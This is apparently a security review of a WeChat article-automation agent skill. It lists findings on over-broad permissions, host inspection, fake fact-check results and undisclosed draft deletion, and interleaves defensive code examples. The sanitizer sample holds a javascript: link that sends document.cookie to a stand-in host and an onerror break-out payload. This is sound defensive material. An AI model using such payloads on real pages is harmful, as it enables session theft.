Wechat Allauto Gzh

Security checks across malware telemetry and agentic risk

Overview

This skill mostly matches its stated WeChat writing and draft-publishing purpose, but it also includes an under-disclosed draft-deletion capability, broad host inspection, and cleanup/Git helper scripts that users should review before installing.

Install only if you intend to let the agent handle WeChat Official Account drafts. Use a dedicated low-privilege WeChat app credential where possible, keep the AppSecret out of prompts and commits, review every draft push, update or delete before it runs, and do not run the cleanup/upload helper scripts until you have verified the exact paths they touch and what they do.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
Findings (31)

Lp3

Medium
Category
MCP Least Privilege
Confidence
93% confidence
Finding
The skill describes capabilities to read environment variables, inspect and write local files, access the network, and run shell commands, yet declares no permissions. This creates a transparency and consent failure: an agent could perform sensitive actions such as reading secrets, persisting data, cloning repositories, or invoking external services without users being clearly warned or the runtime being able to enforce least privilege.

Tp4

High
Category
MCP Tool Poisoning
Confidence
95% confidence
Finding
The declared purpose is article generation and WeChat draft publishing, but the guidance also includes broader host and account operations such as repository setup/push, deletion/cleanup, inspection of cron jobs and home-directory configs, and management of existing WeChat drafts. This mismatch is dangerous because it hides materially different behaviors behind a benign description, increasing the chance that users or platforms authorize the skill without understanding the true access and side effects.

Context-Inappropriate Capability

Medium
Confidence
89% confidence
Finding
The skill instructs the agent to clone a GitHub repository and install dependencies even though that is not necessary for a writing/publishing skill description. Pulling and executing external code expands the attack surface significantly, exposing the host to supply-chain compromise, malicious setup scripts, or unintended code execution.

Context-Inappropriate Capability

Medium
Confidence
92% confidence
Finding
The guidance recommends checking cron jobs and files in the user's home directory to infer operating mode. That is broader host inspection than needed for article generation and can expose unrelated personal or operational information from the local system.

Context-Inappropriate Capability

Medium
Confidence
90% confidence
Finding
The documented design includes inspecting host-level crontab, environment variables, configuration files, and systemd timers to infer operating mode, which exceeds what is necessary for article generation. This creates an unnecessary host reconnaissance capability that can expose system metadata and normalize broad local inspection in a content-writing skill.

Intent-Code Divergence

Medium
Confidence
96% confidence
Finding
The module advertises search-based verification via the Tavily API, but the implementation returns hardcoded mock search results and a fixed successful fact-verification response whenever an API key is present. In this skill’s context, that can cause the agent to present fabricated or unverified information as current and validated, which is a security-relevant integrity issue for automated content generation.

Context-Inappropriate Capability

Medium
Confidence
92% confidence
Finding
The module inspects crontab contents, systemd timers, local config files, and an environment variable to infer writing mode, which exceeds the stated scope of generating and formatting WeChat articles. This creates unnecessary host reconnaissance and privacy exposure, revealing operational details about the machine running the skill.

Context-Inappropriate Capability

Medium
Confidence
92% confidence
Finding
The generated HTML loads html2canvas and FileSaver from public CDNs at runtime, introducing a supply-chain and network-dependency risk into a local cover-generation workflow. If the CDN content is tampered with, blocked, or replaced, opening the generated file in a browser could execute untrusted JavaScript with access to the page context and potentially local browser-exposed data.
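The mitigation a practitioner would want for the CDN finding is either to vendor the two libraries into the skill's output directory or, if they must stay on a CDN, to pin the script tags to the exact bytes that were reviewed using Subresource Integrity. The following is an added example, not code from the skill: it computes the SRI token for a file's bytes, verifies a token the way a browser would, and emits a pinned script tag. The CDN URL and the library bytes are constructed placeholders for illustration.

```python
import base64
import hashlib
import hmac
import html

# Constructed stand-in for the bytes of a vendored library file, e.g. a pinned
# html2canvas or FileSaver release downloaded once and reviewed. In practice
# read the real file: open("vendor/html2canvas.min.js", "rb").read().
SAMPLE_LIB = b"/* constructed stand-in for a pinned library build */\nwindow.lib = 1;\n"

SRI_ALGOS = ("sha256", "sha384", "sha512")


def sri_for_bytes(data: bytes, algo: str = "sha384") -> str:
    """Return an SRI integrity token ('<algo>-<base64 digest>') for data."""
    if algo not in SRI_ALGOS:
        raise ValueError("SRI allows only sha256, sha384 or sha512")
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(data: bytes, integrity: str) -> bool:
    """Browser-side rule: an integrity attribute may list several tokens; the
    resource is accepted if any token of a supported algorithm matches."""
    for token in integrity.split():
        algo, _, want = token.partition("-")
        if algo not in SRI_ALGOS:
            continue
        got = base64.b64encode(hashlib.new(algo, data).digest()).decode("ascii")
        if hmac.compare_digest(got, want):
            return True
    return False


def pinned_script_tag(url: str, data: bytes) -> str:
    """Emit a script tag pinned to the exact bytes reviewed at build time.
    crossorigin="anonymous" is required for SRI to apply to a cross-origin CDN URL."""
    return (f'<script src="{html.escape(url, quote=True)}" '
            f'integrity="{sri_for_bytes(data)}" crossorigin="anonymous"></script>')


if __name__ == "__main__":
    # Hypothetical CDN URL; the real tag would point at the pinned release.
    print(pinned_script_tag("https://cdn.example/html2canvas.min.js", SAMPLE_LIB))
```

A pinned tag fails closed: if the CDN serves different bytes the browser refuses to execute the script rather than running whatever arrived. Pinning does not help with the "blocked" case in the finding; only vendoring the files next to the generated HTML removes the network dependency entirely.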

Intent-Code Divergence

Medium
Confidence
95% confidence
Finding
The converter claims to produce 'WeChat-safe HTML', but user-controlled link and image URLs are inserted directly into href and src attributes without scheme validation, escaping for attribute context, or allowlisting. In a content-generation skill that turns arbitrary user Markdown into publishable HTML, this can enable unsafe links, tracking/exfiltration URLs, or platform-specific script/payload vectors if the downstream renderer or editor is permissive.

Intent-Code Divergence

Medium
Confidence
91% confidence
Finding
The code defines SAFE_TAGS and SAFE_CSS as if output safety is enforced, but those controls are never actually applied to generated HTML. This is dangerous because it creates a false sense of sanitization while the converter still emits raw constructed HTML from untrusted Markdown transformations, increasing the chance that unsafe tags, attributes, or styles slip through as features evolve.
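The two converter findings above (unvalidated href/src insertion, and SAFE_TAGS/SAFE_CSS that are defined but never applied) are easiest to see side by side. The following is an added example written for this review, not the skill's converter: a minimal link/image renderer in the weak form the finding describes, the hardened form with a scheme allowlist and attribute-context escaping, and an allowlist filter that actually enforces a SAFE_TAGS set over the produced HTML. The Markdown sample is constructed; the tag and attribute sets are this example's choice, not the skill's.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample Markdown (not from the skill): a benign link, a
# javascript: link, an image URL that breaks out of the src attribute, and a
# link whose query string carries a tracking parameter.
SAMPLE_MD = (
    '[docs](https://example.com/x "t")\n'
    "[evil](javascript:document.location='https://evil.example/?c='+document.cookie)\n"
    '![img](https://img.example.com/a.png"onerror="top.location=\'//evil.example\')\n'
    '[tracker](http://t.example.net/?u=me@example.com)\n'
)

# Minimal link/image syntax; a real converter would use a full Markdown parser.
LINK_RE = re.compile(r'(!?)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')


def render_links_unsafe(md):
    """The pattern the finding describes: the URL is dropped straight into href/src."""
    def sub(m):
        bang, text, url = m.groups()
        if bang:
            return f'<img src="{url}" alt="{text}">'
        return f'<a href="{url}">{text}</a>'
    return LINK_RE.sub(sub, md)


ALLOWED_LINK_SCHEMES = {"http", "https", "mailto"}
ALLOWED_IMG_SCHEMES = {"http", "https"}


def safe_url(url, allowed):
    """Return an attribute-escaped URL, or None if its scheme is not allowlisted.
    Scheme-less (relative) URLs are rejected too: they mean nothing in a WeChat
    article and are a common way to smuggle odd schemes past a check."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in allowed:
        return None
    return html.escape(url, quote=True)


def render_links_safe(md):
    """Hardened form: scheme allowlist plus escaping for the attribute context."""
    def sub(m):
        bang, text, url = m.groups()
        text = html.escape(text, quote=True)
        if bang:
            src = safe_url(url, ALLOWED_IMG_SCHEMES)
            return f'<img src="{src}" alt="{text}">' if src else text
        href = safe_url(url, ALLOWED_LINK_SCHEMES)
        return f'<a href="{href}">{text}</a>' if href else text
    return LINK_RE.sub(sub, md)


# What "applying SAFE_TAGS" looks like: unknown tags and attributes are
# dropped and URL attributes go through safe_url a second time.
SAFE_TAGS = {"p", "a", "img", "strong", "em", "h2", "h3", "ul", "ol", "li",
             "blockquote", "code", "pre", "br"}
SAFE_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
VOID_TAGS = {"img", "br"}


class TagAllowlist(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in SAFE_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in SAFE_ATTRS.get(tag, set()):
                continue
            value = value or ""
            if name in ("href", "src"):
                value = safe_url(value, ALLOWED_IMG_SCHEMES if tag == "img" else ALLOWED_LINK_SCHEMES)
                if value is None:
                    continue
            else:
                value = html.escape(value, quote=True)
            kept.append(f' {name}="{value}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in SAFE_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")


def sanitize_html(fragment):
    """Rebuild the fragment keeping only allowlisted tags and attributes."""
    p = TagAllowlist()
    p.feed(fragment)
    p.close()
    return "".join(p.out)
```

The scheme allowlist stops `javascript:` links and the attribute escaping stops the `"onerror="` break-out, but the tracking link still passes: deciding which hosts an article may link or load images from is a policy choice (a host allowlist) that a scheme check alone does not make.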

Description-Behavior Mismatch

Medium
Confidence
89% confidence
Finding
The skill metadata describes automated article writing, theming, cover generation, and pushing drafts, but this script adds a destructive draft-deletion capability that is outside that stated scope. In an agent skill context, undocumented account-management actions are dangerous because users may invoke the skill expecting content generation, while the code can also remove existing assets from their WeChat account.

Context-Inappropriate Capability

Medium
Confidence
93% confidence
Finding
The code can permanently delete existing WeChat drafts, which is a destructive account-management action not required for the advertised purpose of article generation and formatting. In this context that mismatch increases risk because a writing assistant should not silently possess broader powers over a user's publishing backlog without clear disclosure and safeguards.
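If a draft-deletion capability stays in the skill at all, the safeguards the two findings above ask for are a dry-run default, a confirmation that names the exact asset, and an audit record. The following is an added example, not the skill's script: a guard that wraps whatever function performs the delete. The network call is injected as `delete_fn`, so the example runs offline and makes no assumption about the skill's own API client.

```python
import json
import time


class DraftDeleteGuard:
    """Wraps a destructive call (deleting a WeChat draft by media_id) with a
    dry-run default, an explicit per-item confirmation, and an audit trail."""

    def __init__(self, delete_fn, dry_run=True, audit=None):
        self.delete_fn = delete_fn    # injected: the function that actually calls the API
        self.dry_run = dry_run
        self.audit = audit if audit is not None else []

    def _record(self, media_id, status, detail=""):
        self.audit.append({"ts": time.time(), "action": "draft.delete",
                           "media_id": media_id, "status": status, "detail": detail})

    def delete(self, media_id, confirm=None):
        """Return True only if the draft was actually deleted.
        `confirm` must equal the media_id being deleted: a model that merely
        emits 'yes' cannot pass this check, it has to name the exact asset."""
        if self.dry_run:
            self._record(media_id, "dry-run", "would delete")
            return False
        if confirm != media_id:
            self._record(media_id, "refused", "confirmation did not name this media_id")
            return False
        ok = bool(self.delete_fn(media_id))
        self._record(media_id, "deleted" if ok else "failed")
        return ok

    def audit_json(self):
        """Audit trail as JSON, suitable for writing next to the skill's output."""
        return json.dumps(self.audit, ensure_ascii=False)


if __name__ == "__main__":
    # Constructed stand-in for the real API call: records the id, reports success.
    calls = []
    guard = DraftDeleteGuard(lambda mid: calls.append(mid) or True, dry_run=False)
    guard.delete("MEDIA_A", confirm="yes")        # refused: confirmation is not the id
    guard.delete("MEDIA_A", confirm="MEDIA_A")    # deleted
    print(guard.audit_json(), calls)
```

The point of tying the confirmation to the media_id rather than a generic yes/no is that an agent prompt-injected into "delete everything" still has to produce each id from a listing, which shows up in the audit trail and in the user's review step.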

Context-Inappropriate Capability

Medium
Confidence
88% confidence
Finding
This script performs repository cleanup and local Git initialization/committing, which is unrelated to the declared WeChat article generation skill and expands the skill's capabilities into filesystem modification and source-control operations. In the context of an agent skill, such out-of-scope behavior is dangerous because it can delete local directories/files and package potentially sensitive project contents into a commit without being necessary for the advertised user task.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The README promotes one-click pushing of generated content to a WeChat public account draft box but does not clearly warn users that content and metadata will be transmitted to an external platform and may trigger account-side effects. In an agent-driven workflow, this omission increases the chance of users authorizing publication-related actions without understanding the privacy and operational consequences.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The README instructs users to place AppID and AppSecret in environment configuration without warning that these are sensitive credentials that can enable unauthorized access to the user's WeChat integration if exposed. In a skill intended for automation, missing credential-handling guidance materially increases the risk of accidental secret leakage through commits, logs, screenshots, or shared environment files.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The OpenClaw workflow description says the agent will automatically generate and push content to the WeChat draft box, but it does not warn that this is an external action performed on the user's behalf. That is risky in an agent context because users may interpret the feature as local content generation only, while the skill can actually affect a third-party account.

Missing User Warnings

Medium
Confidence
87% confidence
Finding
The skill persists generated articles, metadata, and covers to local output files without prominently warning the user. This can leak sensitive drafts, unpublished content, internal references, or account-related metadata onto disk where other users, backups, or later processes may access it.

Missing User Warnings

High
Confidence
96% confidence
Finding
The skill asks users to configure AppID/AppSecret and send article content to WeChat APIs without explicit security and privacy warnings. This is dangerous because it involves transmitting credentials and potentially sensitive unpublished content to an external service, and users are not clearly informed about exposure, storage, or misuse risks.
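The credential-handling guidance the README lacks (this finding and the earlier one about placing AppID/AppSecret in environment configuration) comes down to three habits: read the secret from the environment only, scrub it from anything that is logged, and refuse to put it into model context. The following is an added example, not the skill's code; the environment variable names `WECHAT_APPID` and `WECHAT_APPSECRET` are this example's assumption, since the README names the values but not the keys.

```python
import io
import logging
import os

# Assumed variable names; the README names the values (AppID, AppSecret) but
# the exact environment keys are this example's choice.
APPID_VAR = "WECHAT_APPID"
SECRET_VAR = "WECHAT_APPSECRET"


def load_wechat_credentials(env=None):
    """Read credentials from the environment only, never from a prompt or a
    file tracked by Git. Fail closed when either value is missing."""
    env = os.environ if env is None else env
    app_id = env.get(APPID_VAR, "").strip()
    secret = env.get(SECRET_VAR, "").strip()
    if not app_id or not secret:
        raise RuntimeError(f"set {APPID_VAR} and {SECRET_VAR} in the environment")
    return app_id, secret


def redact(text, secrets):
    """Replace every occurrence of a secret with a fixed marker. The WeChat
    access-token endpoint takes the AppSecret as a query parameter, so request
    URLs and HTTP error messages are exactly where it tends to leak."""
    for s in secrets:
        if s:
            text = text.replace(s, "[REDACTED]")
    return text


class SecretRedactor(logging.Filter):
    """Logging filter that scrubs secrets before any handler formats the record."""

    def __init__(self, secrets):
        super().__init__()
        self.secrets = list(secrets)

    def filter(self, record):
        record.msg = redact(record.getMessage(), self.secrets)
        record.args = ()
        return True


def log_line_with_redaction(message, secrets):
    """Demonstration helper: log one line through the filter and return it."""
    buf = io.StringIO()
    logger = logging.getLogger("wechat.skill.demo")
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = logging.StreamHandler(buf)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    handler.addFilter(SecretRedactor(secrets))
    logger.addHandler(handler)
    logger.info(message)
    handler.flush()
    return buf.getvalue().strip()


def prompt_is_clean(prompt, secrets):
    """Gate before sending context to the model: refuse if a secret is inside."""
    return not any(s and s in prompt for s in secrets)
```

The filter sits on the handler rather than the logger so that it also covers records from third-party HTTP libraries that log request URLs; install it on every handler, not just the skill's own.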

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The skill recommends using Tavily for fact validation without warning that factual claims or article excerpts may be sent to a third-party search provider. This can disclose confidential draft content or sensitive topics to an external service outside the user's expectations.

Missing User Warnings

Medium
Confidence
88% confidence
Finding
The checklist tells users to run several recursive and force-delete commands against absolute local paths, including deleting directories and special files, but it does not clearly warn about irreversible data loss or advise verifying the target path before execution. In a repository upload checklist, this increases the chance of accidental destruction of local files if the path is mistyped, copied into the wrong environment, or adapted unsafely by users.
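Where a checklist hands an agent recursive force-delete commands against absolute paths, the practical control is a pre-check that refuses anything outside a known root, anything that resolves through a symlink, and any system path, with a dry run as the default. The following is an added example, not the skill's cleanup script; the protected-path list and the repository root used in it are this example's assumptions.

```python
import os
import shutil
from pathlib import Path

# Paths that must never be a deletion target, whatever a checklist says.
NEVER_DELETE = {"/", "/bin", "/boot", "/etc", "/home", "/lib", "/opt", "/root",
                "/sbin", "/srv", "/tmp", "/usr", "/var"}


def check_delete_target(target, allowed_root):
    """Decide whether `target` may be recursively deleted.
    Rules: absolute path, not (and not resolving to) a protected path, no
    symlink traversal, and strictly inside allowed_root (never the root itself)."""
    if not os.path.isabs(target):
        return False, "target must be an absolute path"
    norm = os.path.normpath(target)
    real = os.path.realpath(target)
    if norm != real:
        return False, f"target traverses a symlink ({norm} -> {real})"
    if real in NEVER_DELETE:
        return False, f"{real} is a protected path"
    root = Path(os.path.realpath(allowed_root))
    if root not in Path(real).parents:
        return False, f"{real} is not strictly inside {root}"
    return True, "ok"


def safe_rmtree(target, allowed_root, dry_run=True):
    """Delete only after the check passes; dry-run by default so the agent's
    transcript shows what would go before anything does."""
    ok, reason = check_delete_target(target, allowed_root)
    if not ok:
        raise PermissionError(reason)
    if dry_run:
        return f"would delete {target}"
    shutil.rmtree(target)
    return f"deleted {target}"


if __name__ == "__main__":
    # Hypothetical repository root used for illustration.
    root = "/wechat-skill-example/repo"
    for t in (root + "/output", root + "/../other", root, "/"):
        print(t, check_delete_target(t, root))
```

Resolving the path before the containment check matters: `/repo/../etc` normalises to `/etc`, and a symlink inside the repository can point anywhere, so the comparison must be done on the resolved path, not the string the checklist was given.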

Vague Triggers

Medium
Confidence
93% confidence
Finding
The invocation phrase '我想写一篇关于[主题]的文章' ("I want to write an article about [topic]") is extremely broad and overlaps with normal writing requests, so the skill may activate when a user simply wants generic writing help rather than this specific automation workflow. In an agent environment, overly generic triggers can cause unintended execution of file operations, web research, and workflow steps without the user clearly opting into this skill.

Vague Triggers

Medium
Confidence
89% confidence
Finding
The review trigger phrase '请审校这篇文章,降低AI味' ("Please proofread this article and make it sound less AI-generated") is ambiguous because it resembles an ordinary editing request and does not clearly signal use of this specific skill. This can cause the skill to activate unexpectedly during normal conversation and initiate its internal review workflow when the user only intended standard feedback.

Vague Triggers

Medium
Confidence
87% confidence
Finding
The modification trigger phrase '请修改[具体要求]' ("Please revise: [specific requirement]") is so generic that it matches routine assistant usage across many contexts. Because the skill also advertises automatic workflow behavior, this broad trigger can lead to unintended activation and hidden side effects such as reading project files or rewriting content under the skill's rules.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The README states that the system will automatically search personal materials and perform online research, but it does not provide a clear warning, consent flow, or data-handling boundaries. In this context, the skill is specifically designed to ingest personal writing archives and external content, so silent or poorly disclosed access creates meaningful privacy and confidentiality risk.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The overview advertises '一键推送草稿' ("one-click draft push") and describes automatic upload, token retrieval and draft creation against the WeChat API, but it does not clearly warn that user content and images will be transmitted to external services or that remote draft state will be created or modified. In an agent context, missing disclosure around outbound data transfer and side effects can cause users to unknowingly publish sensitive content to a third-party platform or alter a production account.

VirusTotal

64/64 vendors flagged this skill as clean.
